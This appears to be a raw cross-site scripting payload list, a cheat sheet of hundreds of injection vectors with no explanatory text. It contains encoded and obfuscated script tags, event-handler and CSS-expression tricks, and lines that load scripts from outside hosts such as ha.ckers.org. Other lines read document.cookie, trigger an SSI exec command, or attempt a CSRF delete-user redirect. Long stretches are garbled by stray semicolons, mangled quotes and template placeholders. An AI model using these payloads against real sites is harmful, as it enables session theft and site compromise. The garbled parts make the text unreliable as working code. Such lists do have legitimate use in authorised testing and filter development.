+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie)   alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))   ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“=0\”autofocus/onfocus=alert(1)–>”-confirm(3)-”           <a>xxs link</a> <a>xxs link</a> alert(“XSS”)”>                 <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>  <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(‘XSS’); alert(“XSS”);     li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS        @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)';  exp/*<A> alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);}<A></A> BODY{background:url(“javascript:alert(‘XSS’)”)}   ¼script¾alert(¢XSS¢)¼/script¾             <!--[if gte IE 4]>alert('XSS');<![endif]-->   <!–#exec cmd="/bin/echo '<!--#exec cmd= <? 
echo('alert(“XSS”)’); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS 0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” veris–>group element[attribute=’ [
[” onmouseover=”alert(‘RVRSH3LL_XSS’);” ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg(“XSS”) for((i)in(self))eval(i)(1) <script>alert(1)</script><script>alert(1)</script> <sCRiPt>alert(1)</SCrIPt> test %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; “>”>123 “>123 “>123 “>alert(`TEXT YOU WANT TO BE DISPLAYED`);123 “>123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 “>”>123 “>123 <iframe src=http://xss.rocks/scriptlet.html < {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> <script xlink:href=data&colon;,window.open('https://www.google.com/') </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ 
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) \x3Cscript>javascript:alert(1) ‘”`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!–\x3E –> –> –> –> –> –> `”‘> test “‘`>a=’hello\x27;javascript:alert(1)//'; test test test test test test test test test test test test test test /* *\x2A/javascript:alert(1)// */ /* *\x00/javascript:alert(1)// */ </style\x3E </style\x0D </style\x09 </style\x20 </style\x0A “‘`>ABCDEF “‘`>ABCDEF if(“x\\xE1\x96\x89″.length==2) { javascript:alert(1);} if(“x\\xE0\xB9\x92″.length==2) { javascript:alert(1);} if(“x\\xEE\xA9\x93″.length==2) { javascript:alert(1);} ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) “‘`> “‘`> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> “`’>\x3Bjavascript:alert(1) “`’>\x0Djavascript:alert(1) “`’>\xEF\xBB\xBFjavascript:alert(1) 
“`’>\xE2\x80\x81javascript:alert(1) “`’>\xE2\x80\x84javascript:alert(1) “`’>\xE3\x80\x80javascript:alert(1) “`’>\x09javascript:alert(1) “`’>\xE2\x80\x89javascript:alert(1) “`’>\xE2\x80\x85javascript:alert(1) “`’>\xE2\x80\x88javascript:alert(1) “`’>\x00javascript:alert(1) “`’>\xE2\x80\xA8javascript:alert(1) “`’>\xE2\x80\x8Ajavascript:alert(1) “`’>\xE1\x9A\x80javascript:alert(1) “`’>\x0Cjavascript:alert(1) “`’>\x2Bjavascript:alert(1) “`’>\xF0\x90\x96\x9Ajavascript:alert(1) “`’>-javascript:alert(1) “`’>\x0Ajavascript:alert(1) “`’>\xE2\x80\xAFjavascript:alert(1) “`’>\x7Ejavascript:alert(1) “`’>\xE2\x80\x87javascript:alert(1) “`’>\xE2\x81\x9Fjavascript:alert(1) “`’>\xE2\x80\xA9javascript:alert(1) “`’>\xC2\x85javascript:alert(1) “`’>\xEF\xBF\xAEjavascript:alert(1) “`’>\xE2\x80\x83javascript:alert(1) “`’>\xE2\x80\x8Bjavascript:alert(1) “`’>\xEF\xBF\xBEjavascript:alert(1) “`’>\xE2\x80\x80javascript:alert(1) “`’>\x21javascript:alert(1) “`’>\xE2\x80\x82javascript:alert(1) “`’>\xE2\x80\x86javascript:alert(1) “`’>\xE1\xA0\x8Ejavascript:alert(1) “`’>\x0Bjavascript:alert(1) “`’>\x20javascript:alert(1) “`’>\xC2\xA0javascript:alert(1) “/> “/> “/> “/> “/> “/> “/> “/> “/> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) “> “> “> “> “> “> “> “> “> “> “> “> “> “> “> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> javascript:alert(1) <video poster=javascript:javascript:alert(1)// …………… X X CLICKME CLICKME <!– <img src=" <img src=" XXX javascript:alert(1) <b alert(1)0 document.getElementById(“div2″).innerHTML = document.getElementById(“div1″).innerHTML; x javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)’>”> javascript:alert(1)”> javascript:alert(1)”> d.innerHTML=d.innerHTML XXX <img src="x` `javascript:alert(1)”` `> “> <!–[if –> X p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red}; <link rel=stylesheet 
href=data:,*%7bx:expression(javascript:alert(1))%7d @import “data:,*%7bx:expression(javascript:alert(1))%7D”; XXXXXX *[{}@import’%(css)s?]X XXX XXX *{x:expression(javascript:alert(1))} X X with(document.getElementById(“d”))innerHTML=innerHTML X X XXX #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)() &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 1 1 XXX x %(payload)s javascript:alert(1) <SCRIPT SRC=%(jscript)s? <%(payload)s//< <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < @import’%(css)s'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> li {list-style-image: url(“javascript:javascript:alert(1)”);}XSS javascript:alert(1); .XSS{background-image:url(“javascript:javascript:alert(1)”);} BODY{background:url(“javascript:javascript:alert(1)”)} XSS”””,”XML namespace.”),(“””<IMG SRC=”javascript:javascript:alert(1)”> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X @import’%(css)s'; a{background:url(‘s1′ ‘s2)}@import javascript:javascript:alert(1);’);} &&javascript:alert(1)&&;&& javascript:alert(1); <![CDATA[<IMG SRC="javas]]]] test1 test1 <embed width=500 height=500 code="data:text/html,%(payload)s”> “> ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= xxs link xxs link alert(“XSS”)”> perl -e ‘print “”;’ > out <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? 
<IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? 
/**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me ”;!–“=’>//\\,”>”>”*” ‘); alert(‘XSS alert(1); alert(‘XSS’); alert(“XSS”)”> <script>alert(‘XSS’);</script> alert(String.fromCharCode(88,83,83)) @im\port’\ja\vasc\ript:alert(\”XSS\”)'; <? 
echo('alert(\”XSS\”)’); ?> alert(‘XSS’) “>alert(0) alert(/xss/) alert(/xss/) alert(‘XSS’) window.alert(“Bonjour !”); <iframe onload=alert(‘XSS’)> “><script alert(String.fromCharCode(88,83,83)) ‘>>XSS ‘”>>alert(‘XSS’) ‘”>>XSS var var = 1; alert(var) BODY{background:url(“javascript:alert(‘XSS’)”)} <?='alert(“XSS”)’?> ” onfocus=alert(document.domain) “> <" li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}XSS perl -e ‘print \”alert(\”XSS\”)\”;’ > out perl -e ‘print \”\”;’ > out alert(1) alert(1) “> [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123) ‘”>alert(1111) ‘”>alert(document.cookie) ‘””> alert(‘X \nS \nS’); <<<>>><<alert(123) (123)(123) ‘>alert(123) ‘>”> }a=eval;b=alert;a(b(/XSS/.source)); document.write(“XSS”); a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d); =’>alert(“xss”) “+src=”http://yoursite.com/xss.js?69,69″> alert(navigator.userAgent)> “>/XaDoS/>alert(document.cookie) “>/KinG-InFeT.NeT/>alert(document.cookie) src=”http://www.site.com/XSS.js”> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !–” />alert(‘xss’); alert(“XSS by \nxss”)XSS by xss “>alert(“XSS by \nxss”)>XSS by xss ‘”>alert(“XSS by \nxss”)>XSS by xss alert(“XSS by \nxss”)XSS by xss alert(1337)XSS by xss “>alert(1337)”>alert(“XSS by \nxss ‘”>alert(1337)>XSS by xss XSS by xss ‘>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83)); >”>alert(561177485777)%3B alert(“XSS”); ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!–"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND 
SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" 
HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!–[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!–#exec cmd="/bin/echo '<SCRIPT SRC'"–><!–#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"–> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav 
ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=javascript:alert("XSS")>";'> out perl -e 'print "&<SCRIPT>alert("XSS")</SCRIPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0×7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; 
\”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=javascript:alert(\"XSS\")>\";' > out perl -e 'print \"<SCRIPT>alert(\"XSS\")</SCRIPT>\";' > out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS 
STYLE=xss:e/**/xpression(alert(‘XSS’))> ‘;;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))//–>;;”;>;';>;;alert(String.fromCharCode(88,83,83)); ‘;';;!–“;;=&;{()} ;alert(‘;XSS';); ;; ;alert(String.fromCharCode(88,83,83)); ; ; ; ; ; ; ; ;;; ;; ; ; ; ; ; ; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); ;li {list-style-image: url(“;javascript:alert('XSS')”;);};;;XSS ; ;; ; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE ; ; ; ; ;; ;;; ;; a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS';);”;)”;; eval(a+b+c+d); ;alert(‘;XSS';);; ; ; ;.XSS{background-image:url(“;javascript:alert(‘;XSS';)”;);};;; ;BODY{background:url(“;javascript:alert(‘;XSS';)”;)}; ; ; ;@import';http://ha.ckers.org/xss.css';;; <;META HTTP-EQUIV=";Link"; Content=";;; REL=stylesheet”;>; ;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss”;)}; ;; ;;;; ; ;;;<;![CDATA[;;]]>; ;;;<;IMG SRC=";javas;cript:alert(‘;XSS';)”;>;;;; ;; ;; ; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=;alert(‘;XSS';);”;>; ; ;; <;!–#exec cmd=";/bin/echo ';;;;';”;–>; <;? 
echo(';<;SCR)';; ; ; ; ; ; ; ; ; ; ;; ;+ADw-SCRIPT+AD4-alert(‘;XSS';);+ADw-/SCRIPT+AD4- \”;;alert(‘;XSS';);// ;;alert(“XSS”);; ;@im\port';\ja\vasc\ript:alert(“;XSS”;)';;; ; ; ; ; ; perl -e ‘;print “;”;;';>; out perl -e ‘;print “;&;;alert(“;XSS”;);”;;'; >; out ; ;; ; <;SCRIPT SRC=http://ha.ckers.org/xss.js ; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;;alert(“;XSS”;);//<;; ;;alert(“;XSS”;);”;>; ;a=/XSS/ ;”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;; ;; ;';”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;` SRC=”;http://ha.ckers.org/xss.js”;>;; ;document.write(“;<;SCRI";);;PT SRC=”;http://ha.ckers.org/xss.js”;>;; ‘;>”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 